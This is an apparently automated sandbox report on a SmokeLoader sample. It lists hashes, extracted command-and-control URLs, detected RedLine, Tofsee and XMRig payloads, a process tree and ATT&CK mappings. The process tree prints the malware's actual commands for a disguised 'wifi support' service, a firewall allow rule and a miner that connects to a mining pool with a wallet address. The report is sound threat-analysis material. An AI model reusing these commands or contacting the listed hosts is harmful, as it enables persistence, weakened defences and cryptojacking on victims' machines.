Analysis

  • max time kernel
    152s
  • max time network
    161s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-08-2021 07:27

General

  • Target

    eb7b5911cfc0a95a5066f39ed22aee0a.exe

  • Size

    150KB

  • MD5

    eb7b5911cfc0a95a5066f39ed22aee0a

  • SHA1

    afadeda0c47ebf866bc55fc6b78d69d475d5f333

  • SHA256

    67ebaa4e613b155a8584614552de369a48d854f8b38e9c6f6319d71f287ea0f9

  • SHA512

    c2b29799397f485edcbe2180ef3b11b35296f84774aba2ed0752e7e883f1de824b406b285cd44beb10bf061d37a3107d2015b2b37e0ad66373dc50bbc24442fe

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eb7b5911cfc0a95a5066f39ed22aee0a.exe
    "C:\Users\Admin\AppData\Local\Temp\eb7b5911cfc0a95a5066f39ed22aee0a.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:568
    • C:\Users\Admin\AppData\Local\Temp\eb7b5911cfc0a95a5066f39ed22aee0a.exe
      "C:\Users\Admin\AppData\Local\Temp\eb7b5911cfc0a95a5066f39ed22aee0a.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2856
  • C:\Users\Admin\AppData\Local\Temp\3B73.exe
    C:\Users\Admin\AppData\Local\Temp\3B73.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:3776
  • C:\Users\Admin\AppData\Local\Temp\3F4D.exe
    C:\Users\Admin\AppData\Local\Temp\3F4D.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:3588
  • C:\Users\Admin\AppData\Local\Temp\421D.exe
    C:\Users\Admin\AppData\Local\Temp\421D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uupvfzus\
      2⤵
        PID:2976
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xoohxwxl.exe" C:\Windows\SysWOW64\uupvfzus\
        2⤵
          PID:3932
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create uupvfzus binPath= "C:\Windows\SysWOW64\uupvfzus\xoohxwxl.exe /d\"C:\Users\Admin\AppData\Local\Temp\421D.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:2124
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description uupvfzus "wifi internet conection"
            2⤵
              PID:2172
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start uupvfzus
              2⤵
                PID:1928
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1860
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:1192
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:2560
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:844
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe
                      1⤵
                        PID:572
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:1720
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe
                          1⤵
                            PID:3960
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                              PID:8
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe
                              1⤵
                                PID:2064
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:624
                                • C:\Windows\SysWOW64\uupvfzus\xoohxwxl.exe
                                  C:\Windows\SysWOW64\uupvfzus\xoohxwxl.exe /d"C:\Users\Admin\AppData\Local\Temp\421D.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:628
                                  • C:\Windows\SysWOW64\svchost.exe
                                    svchost.exe
                                    2⤵
                                    • Drops file in System32 directory
                                    • Suspicious use of SetThreadContext
                                    • Modifies data under HKEY_USERS
                                    PID:2352
                                    • C:\Windows\SysWOW64\svchost.exe
                                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                      3⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2228

                                Network

                                MITRE ATT&CK Matrix ATT&CK v6

                                Persistence

                                New Service

                                1
                                T1050

                                Modify Existing Service

                                1
                                T1031

                                Registry Run Keys / Startup Folder

                                1
                                T1060

                                Privilege Escalation

                                New Service

                                1
                                T1050

                                Defense Evasion

                                Disabling Security Tools

                                1
                                T1089

                                Modify Registry

                                2
                                T1112

                                Virtualization/Sandbox Evasion

                                1
                                T1497

                                Credential Access

                                Credentials in Files

                                2
                                T1081

                                Discovery

                                Query Registry

                                4
                                T1012

                                Virtualization/Sandbox Evasion

                                1
                                T1497

                                System Information Discovery

                                4
                                T1082

                                Peripheral Device Discovery

                                1
                                T1120

                                Collection

                                Data from Local System

                                2
                                T1005

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Temp\3B73.exe
                                  MD5

                                  9aa6dd10e0bfb49baa17f04f44b9dcd3

                                  SHA1

                                  09ad5a6ae8a6396e7bdf783cd124417cd7515c7a

                                  SHA256

                                  a07cf8a0e1fadc8ab20dbe35341f1febb3a0b2e42c8f5991c0cc397b130d7621

                                  SHA512

                                  601f36f703ee396dba325349aa25440270c1cee6e069146c1ed7f03e96fe5fc30dead138e7f3b713549b815635e64aa97a10054e71a415690e622c417bbfbb4d

                                • C:\Users\Admin\AppData\Local\Temp\3B73.exe
                                  MD5

                                  9aa6dd10e0bfb49baa17f04f44b9dcd3

                                  SHA1

                                  09ad5a6ae8a6396e7bdf783cd124417cd7515c7a

                                  SHA256

                                  a07cf8a0e1fadc8ab20dbe35341f1febb3a0b2e42c8f5991c0cc397b130d7621

                                  SHA512

                                  601f36f703ee396dba325349aa25440270c1cee6e069146c1ed7f03e96fe5fc30dead138e7f3b713549b815635e64aa97a10054e71a415690e622c417bbfbb4d

                                • C:\Users\Admin\AppData\Local\Temp\3F4D.exe
                                  MD5

                                  59c5becf1794c98cbe8da8e501f55da5

                                  SHA1

                                  e6ce9bb8ac54cc504f93e8dba8632d09d653d986

                                  SHA256

                                  dd0c4b523a427f5e2ea23d010d114e7fe32392768ed0e43c0b61de0d5584ae17

                                  SHA512

                                  3e23f98583e71e79f511b32b8281abe72aae426111929de195ca4f8949b9cf169e0d74fd2eebf91e92b323cc3e8de3fad55ca370fc2694f1bc2a9ffc8e4e7455

                                • C:\Users\Admin\AppData\Local\Temp\3F4D.exe
                                  MD5

                                  59c5becf1794c98cbe8da8e501f55da5

                                  SHA1

                                  e6ce9bb8ac54cc504f93e8dba8632d09d653d986

                                  SHA256

                                  dd0c4b523a427f5e2ea23d010d114e7fe32392768ed0e43c0b61de0d5584ae17

                                  SHA512

                                  3e23f98583e71e79f511b32b8281abe72aae426111929de195ca4f8949b9cf169e0d74fd2eebf91e92b323cc3e8de3fad55ca370fc2694f1bc2a9ffc8e4e7455

                                • C:\Users\Admin\AppData\Local\Temp\421D.exe
                                  MD5

                                  dbcb6648538148af9e93dc2d1e1aaab5

                                  SHA1

                                  0069f5233f6fac388829a9cac40f44bef6f91d6c

                                  SHA256

                                  afc3a8e66189c025e075512800be3d4dac3ba03afb5d6fe3b8bd56aa59c941f5

                                  SHA512

                                  bf571eccd9258280f48763e0d4a21f6c8ca7569cc226fb3ee5d7ce51a28be14925557505773063b151f0faedd0fa07980a940983f168e1340615ebc674abe16d

                                • C:\Users\Admin\AppData\Local\Temp\421D.exe
                                  MD5

                                  dbcb6648538148af9e93dc2d1e1aaab5

                                  SHA1

                                  0069f5233f6fac388829a9cac40f44bef6f91d6c

                                  SHA256

                                  afc3a8e66189c025e075512800be3d4dac3ba03afb5d6fe3b8bd56aa59c941f5

                                  SHA512

                                  bf571eccd9258280f48763e0d4a21f6c8ca7569cc226fb3ee5d7ce51a28be14925557505773063b151f0faedd0fa07980a940983f168e1340615ebc674abe16d

                                • C:\Users\Admin\AppData\Local\Temp\xoohxwxl.exe
                                  MD5

                                  a895152dcbcdaa2b423e30d9a80b8a9f

                                  SHA1

                                  0ee1f31f94a11cdbb97c4c18ad7cf2f6f9c523eb

                                  SHA256

                                  d0a5632bb4c9bd8e62f8c54e4f4779d68159e28878385f5cbb56e87d41aaa310

                                  SHA512

                                  7dc2ee3930d610deb1a80678fd8f79c32f283ea40567e5e3edc3ff20cb1ffef470521dad4819bf44d254aa0d625929fde8737f0887b588a9bd16661c54133073

                                • C:\Windows\SysWOW64\uupvfzus\xoohxwxl.exe
                                  MD5

                                  a895152dcbcdaa2b423e30d9a80b8a9f

                                  SHA1

                                  0ee1f31f94a11cdbb97c4c18ad7cf2f6f9c523eb

                                  SHA256

                                  d0a5632bb4c9bd8e62f8c54e4f4779d68159e28878385f5cbb56e87d41aaa310

                                  SHA512

                                  7dc2ee3930d610deb1a80678fd8f79c32f283ea40567e5e3edc3ff20cb1ffef470521dad4819bf44d254aa0d625929fde8737f0887b588a9bd16661c54133073

                                • memory/8-165-0x0000000000000000-mapping.dmp
                                • memory/8-167-0x00000000027B0000-0x00000000027B9000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/8-166-0x00000000027C0000-0x00000000027C4000-memory.dmp
                                  Filesize

                                  16KB

                                • memory/568-114-0x00000000049D0000-0x00000000049DA000-memory.dmp
                                  Filesize

                                  40KB

                                • memory/572-157-0x0000000000EE0000-0x0000000000EE9000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/572-158-0x0000000000ED0000-0x0000000000EDF000-memory.dmp
                                  Filesize

                                  60KB

                                • memory/572-156-0x0000000000000000-mapping.dmp
                                • memory/624-178-0x0000000002A40000-0x0000000002A49000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/624-174-0x0000000000000000-mapping.dmp
                                • memory/624-177-0x0000000002A50000-0x0000000002A55000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/628-204-0x0000000000400000-0x0000000002CB9000-memory.dmp
                                  Filesize

                                  40.7MB

                                • memory/628-203-0x0000000002FC0000-0x0000000002FD3000-memory.dmp
                                  Filesize

                                  76KB

                                • memory/844-155-0x0000000002BC0000-0x0000000002BCB000-memory.dmp
                                  Filesize

                                  44KB

                                • memory/844-154-0x0000000002BD0000-0x0000000002BD7000-memory.dmp
                                  Filesize

                                  28KB

                                • memory/844-153-0x0000000000000000-mapping.dmp
                                • memory/1192-146-0x0000000002B90000-0x0000000002BFB000-memory.dmp
                                  Filesize

                                  428KB

                                • memory/1192-135-0x0000000000000000-mapping.dmp
                                • memory/1192-145-0x0000000002E00000-0x0000000002E74000-memory.dmp
                                  Filesize

                                  464KB

                                • memory/1580-169-0x0000000000400000-0x0000000002CB9000-memory.dmp
                                  Filesize

                                  40.7MB

                                • memory/1580-168-0x0000000002CC0000-0x0000000002E0A000-memory.dmp
                                  Filesize

                                  1.3MB

                                • memory/1580-125-0x0000000000000000-mapping.dmp
                                • memory/1720-161-0x0000000002810000-0x0000000002819000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/1720-160-0x0000000002820000-0x0000000002825000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/1720-159-0x0000000000000000-mapping.dmp
                                • memory/1860-188-0x0000000000000000-mapping.dmp
                                • memory/1928-185-0x0000000000000000-mapping.dmp
                                • memory/2064-172-0x0000000000360000-0x0000000000369000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/2064-171-0x0000000000370000-0x0000000000375000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/2064-170-0x0000000000000000-mapping.dmp
                                • memory/2124-179-0x0000000000000000-mapping.dmp
                                • memory/2172-183-0x0000000000000000-mapping.dmp
                                • memory/2228-210-0x00000000022C259C-mapping.dmp
                                • memory/2228-211-0x0000000002230000-0x0000000002321000-memory.dmp
                                  Filesize

                                  964KB

                                • memory/2228-206-0x0000000002230000-0x0000000002321000-memory.dmp
                                  Filesize

                                  964KB

                                • memory/2352-199-0x00000000022E9A6B-mapping.dmp
                                • memory/2352-198-0x00000000022E0000-0x00000000022F5000-memory.dmp
                                  Filesize

                                  84KB

                                • memory/2560-149-0x0000000000730000-0x0000000000737000-memory.dmp
                                  Filesize

                                  28KB

                                • memory/2560-150-0x0000000000720000-0x000000000072C000-memory.dmp
                                  Filesize

                                  48KB

                                • memory/2560-142-0x0000000000000000-mapping.dmp
                                • memory/2856-116-0x0000000000402FAB-mapping.dmp
                                • memory/2856-115-0x0000000000400000-0x0000000000409000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/2976-173-0x0000000000000000-mapping.dmp
                                • memory/2988-117-0x0000000000B90000-0x0000000000BA6000-memory.dmp
                                  Filesize

                                  88KB

                                • memory/3588-138-0x0000000005350000-0x0000000005351000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3588-140-0x0000000005580000-0x0000000005581000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3588-121-0x0000000000000000-mapping.dmp
                                • memory/3588-132-0x00000000008C0000-0x00000000008C1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3588-130-0x0000000077CE0000-0x0000000077E6E000-memory.dmp
                                  Filesize

                                  1.6MB

                                • memory/3588-151-0x00000000053F0000-0x00000000053F1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3588-136-0x0000000005A80000-0x0000000005A81000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3588-196-0x0000000007240000-0x0000000007241000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3588-194-0x0000000007280000-0x0000000007281000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3588-147-0x0000000005460000-0x0000000005461000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3776-190-0x0000000008390000-0x0000000008391000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3776-180-0x0000000007260000-0x0000000007261000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3776-186-0x0000000007180000-0x0000000007181000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3776-118-0x0000000000000000-mapping.dmp
                                • memory/3776-192-0x00000000075B0000-0x00000000075B1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3776-148-0x0000000005810000-0x0000000005811000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3776-182-0x0000000007960000-0x0000000007961000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3776-144-0x0000000005860000-0x0000000005861000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3776-128-0x0000000077CE0000-0x0000000077E6E000-memory.dmp
                                  Filesize

                                  1.6MB

                                • memory/3776-202-0x0000000008990000-0x0000000008991000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3776-131-0x0000000000FF0000-0x0000000000FF1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3932-175-0x0000000000000000-mapping.dmp
                                • memory/3960-164-0x0000000000FC0000-0x0000000000FCC000-memory.dmp
                                  Filesize

                                  48KB

                                • memory/3960-162-0x0000000000000000-mapping.dmp
                                • memory/3960-163-0x0000000000FD0000-0x0000000000FD6000-memory.dmp
                                  Filesize

                                  24KB